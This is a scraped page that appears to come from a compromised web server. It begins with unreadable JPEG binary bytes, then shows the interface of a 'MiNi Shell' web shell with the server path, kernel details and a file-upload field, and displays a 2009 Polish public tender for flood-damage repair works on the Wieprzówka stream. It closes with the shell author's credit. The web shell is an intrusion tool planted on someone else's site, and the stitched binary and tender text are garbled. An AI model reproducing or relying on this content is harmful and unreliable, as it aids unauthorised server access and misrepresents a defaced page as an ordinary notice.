JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/285570-N-2009.html

<p class="kh_header"><b>Oświęcim: 1.Usuwanie szkód powodziowych na potoku Wieprzówka w km 7+322-7+342.
2.Usuwanie szkód powodziowych na potoku Wieprzówka w km 7+900-8+100.
3.Usuwanie szkód powodziowych na potoku Wieprzówka   w km 8+740-8+800.
4.Usuwanie szkód powodziowych na potoku Wieprzówka  w km 10+415-10+550.</b><br>
<b>Numer ogłoszenia: 285570 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektora Rejonowy Oświęcim , ul. Strzelecka 10, 32-600 Oświęcim, woj. małopolskie, tel. 033 8431941, faks 033 8431941.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:www.mzmiuw.prv.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.Usuwanie szkód powodziowych na potoku Wieprzówka w km 7+322-7+342.
2.Usuwanie szkód powodziowych na potoku Wieprzówka w km 7+900-8+100.
3.Usuwanie szkód powodziowych na potoku Wieprzówka   w km 8+740-8+800.
4.Usuwanie szkód powodziowych na potoku Wieprzówka  w km 10+415-10+550..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robot związanych z usuwaniem szkód powodziowych na potoku Wieprzówka zlokalizowanych w km 7+322-7+342 w miejscowości Przybradz, w km 7+900-8+100 w miejscowości Gierałtowice, w km 8+740-8+800 w miejscowości Gierałtowice, w km 10+415-10+550 w miejscowości Wieprz, gmina Wieprz powiat wadowicki.
Roboty będą realizowane na podstawie Rozporządzenia Prezesa Rady Ministrów z dnia 28 maja 2008 r. (Dz.U. Nr 99, poz. 642) w sprawie gmin i miejscowości, w których stosuje się szczególne zasady odbudowy, remontów i rozbiórek obiektów budowlanych zniszczonych lub uszkodzonych w wyniku działania żywiołu. 
Zakres robót obejmuje:
1.Potok Wieprzówka w km 7+322-7+342:
-ręczne ścinanie i karczowanie krzaków i podszycia gęstego, 0,08 ha
-konieczne prace ziemne, (usunięcie zatorów w dnie kat. gruntu IV, 10 m3, wykopy wykonane spycharkami kat. gruntu IV, 200 m3, przemieszczenie spycharkami mas ziemnych, nakłady dodatkowe za dlasze rozpoczęte 10 m w przedziale 10-30 m kat. gruntu IV, 200 m3),
-wykonanie wyściółek z faszyny o grubości 25 cm, 50 m2,
-wykonanie z brzegu narzutu kamiennego luzem, wyładunek ręczny, narzut nadwodny z kamienia ciężkiego lub średniego, 60 m3,
-wykonanie bruku z kamienia naturalnego, średniego, na skarpach o wysokości do 4 m o powierzchniach płaskich, bruk grubości 30 cm, wykonanie z brzegu z pełnym zalaniem betonem, 30 m2,
-analogicznie wypełnienie wolnych przestrzeni betonem (przyczółki), 9 m3.
2.Potok Wieprzówka w km 7+900-8+100:
-ręczne ścinanie i karczowanie krzaków i podszycia gęstego, 0,01 ha,
-konieczne prace ziemne -( usunięcie zatorów kat. gruntu IV, 10 m3, wykopy wykonane spycharkami kat. gruntu IV, 800 m3, przemieszczenie spycharkami mas ziemnych, nakłady dodatkowe za dalsze rozpoczęte 10 m w przedziale 10-30 m kat. gruntu IV, 800 m3),
-wykonanie wyściółek z faszyny o grubości 25 cm, 340 m2,
-wykonanie z brzegu narzutu kamiennego luzem, wyładunek  ręczny, narzut nadwodny z kamienia ciężkiego lub średniego, 510 m3.  
3. Potok Wieprzówka w km 8+740-8+800:
-ręczne ścinanie i karczowanie krzaków i podszycia gęstego, 0,006,
-konieczne prace ziemne - (usunięcie zatorów kat. gruntu IV, 10 m3, wykopy wykonane spycharkami kat. gruntu IV, 90 m3, przemieszczenie spycharkami  mas ziemnych, nakłady dodatkowe za dalsze rozpoczęte 10 m w przedziale 10-30 m kat. gruntu IV, 90 m3),
-wykonanie wyściółek z faszyny o grubości 25 cm, 120 m2,
-wykonanie z brzegu narzutu kamiennego luzem, wyładunek  ręczny, narzut nadwodny z kamienia ciężkiego lub średniego, 180 m3.  
4.Potok Wieprzówka w km 10+415-10+550:
-ręczne ścinanie i karczowanie krzaków i podszycia gęstego, 0,03 ha,
-konieczne prace ziemne -( usunięcie zatorów kat. gruntu IV, 20 m3, wykopy wykonane spycharkami kat. gruntu IV, 500 m3, przemieszczenie spycharkami  mas ziemnych, nakłady dodatkowe za dalsze rozpoczęte 10 m w przedziale 10-30 m kat. gruntu IV, 500 m3),
-wykonanie wyściółek z faszyny o grubości 25 cm, 270 m2,
-wykonanie z brzegu narzutu kamiennego luzem, wyładunek  ręczny, narzut nadwodny z kamienia ciężkiego lub średniego, 350 m3..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.24.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Rozliczenia między Wykonawcą, a Zamawiającym będą dokonywane w złotych polskich.
2.Wadium 
2.1 Wadium wysokości 5 000,00 zł (słownie: pięć tysięcy 00/100 zł) należy wnieść przed upływem terminu składania ofert określonym w rozdziale XI pkt.2.
Wadium winno być wniesione w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z   tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. Nr 42, poz. 275 z 2007 r.)
Wadium wnoszone w pieniądzu należy przelać na rachunek KREDYT BANK PBI S.A. II O /  KRAKÓW nr konta 70 1500 1487 1214 8003 1851 0000.
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego w IR Oświęcim ul. Strzelecka 10 sekretariat (pok. nr 7).
Dowód wpłaty wadium należy dołączyć do oferty. 
2.2 Wadium wnoszone w formie gwarancji lub poręczeń musi spełniać następujące wymogi:
- być wystawione na Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie,
-zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłat kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek wymienionych w art. 46 ust 5 Ustawy.
- w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązania gwaranta (poręczyciela) z tytułów związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań określonych w art. 46 ust. 5 Ustawy każdego z tych wykonawców
- okres ważności wadium nie może być krótszy niż okres związania ofertą.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> OPIS WARUNKÓW UDZIAŁU:
W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy oraz nie podlegają wykluczeniu na podstawie art. 24 Ustawy, w szczególności: 
1.posiadają uprawnienia do wykonywania działalności lub czynności, o której mowa w przedmiocie zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tzn.
a)Wykonali co najmniej 1 robotę budowlaną w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością (wartość 1 roboty nie mniejsza niż 150 000,00 zł - słownie: pięćdziesiąt tysięcy 00/100 złotych) robotom budowlanym stanowiącym przedmiot zamówienia. Za roboty budowlane odpowiadające swoim rodzajem Zamawiający uznaje roboty w zakresie usuwania szkód powodziowych lub regulacji rzek i potoków. Zakres 1 roboty musi obejmować wykonanie koszy siatkowo - kamiennych lub gurtów z koszy siatkowo - kamiennych na rzekach lub potokach.
b)dysponują sprzętem i urządzeniami niezbędnymi do wykonania zamówienia, w szczególności: co najmniej: koparka 1 szt., spycharka 1 szt., samochód samowyładowczy 1 szt.
c)dysponują osobami posiadającymi kwalifikacje konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 ( tj. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.), to jest kierownik budowy posiada uprawnienia uprawnienia o specjalności konstrukcyjno - budowlanej do kierowania robotami w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów oraz jest członkiem Okręgowej Izby Inżynierów Budownictwa.
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum stanowiącą wartość złożonej oferty.
4.nie podlegają wykluczeniu z postępowania, zgodnie z art. 24 Ustawy;
OPIS SPOSOBU OCENY:
1.Zamawiający wybierze najkorzystniejszą ofertę kierując się następującym kryterium: 
C - cena oferty brutto podanej w punkcie 3 załącznika nr 1 do siwz Druku OFERTA)-100%
2.Punkty przyznawane za podane w ust. 1 kryterium będą liczone według następującego wzoru:
C= (Cena oferty najtańszej / Cena oferty badanej) x 100 pkt 							
3.Przy ocenie ofert brana będzie pod uwagę kwota brutto.
4.Obliczenia dokonywane są do dwóch miejsc po przecinku.
5.Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska największą liczbę punktów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.
2.Wykonawca w celu potwierdzenia, że posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Ustawy jest zobowiązany do złożenia w ofercie: 
A) Koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym;
B) Aktualnego odpisu z właściwego rejestru lub aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności  gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
C) Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
D) Oświadczenie Wykonawcy sporządzonego zgodnie z drukiem stanowiącym załącznik nr 4 do siwz - OŚWIADCZENIE WYKONAWCY.
A. Wykazu wykonanych zamówień w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamówień odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że zostały wykonane należycie. Wykaz należy sporządzić zgodnie z drukiem 	stanowiącym załącznik nr 2 do siwz - WYKAZ ZREALIZOWANYCH ZAMÓWIEŃ.
B.Wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca. Wykaz należy sporządzić zgodnie z drukiem stanowiącym załącznik nr 5 do siwz - WYKAZ SPRZĘTU TECHNICZNEGO.
C.Wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywani zamówienia, a także zakresu wykonywanych przez nich czynności. Wykaz należy sporządzić zgodnie z drukiem stanowiącym załącznik nr 3 do SIWZ - WYKAZ OSÓB I PODMIOTÓW.
W przypadku braku zatrudnienia, dołączyć pisemne zobowiązanie podmiotu, który udostępni swoich pracowników Wykonawcy dla potrzeb realizacji zamówienia lub w przypadku osób fizycznych oświadczenie, że wyrażają zgodę na uczestnictwo w realizacji przedmiotu zamówienia po stronie Wykonawcy.
D.Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia oraz należą do Okręgowej Izby Inżynierów Budownictwa.
d)Wykonawca w celu potwierdzenia warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia jest zobowiązany do przedłożenia polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
e)W wypadku, gdy kilku Wykonawców wspólnie ubiega się o zamówienie, do oferty należy załączyć wszystkie dokumenty jak w ust. 2, 3 i 4 z tym, że dokumenty wskazane w ust. 2 muszą być wystawione na każdego z Wykonawców osobno.
f)Dokumenty, o których mowa w ust. 2 -5 niniejszego działu powinny być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie
Inspektorat Rejonowy w Oświęcimiu 32-600 Oświęcim ul. Strzelecka 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 09:00, miejsce: Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie
Inspektorat Rejonowy w Oświęcimiu 32-600 Oświęcim ul. Strzelecka 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com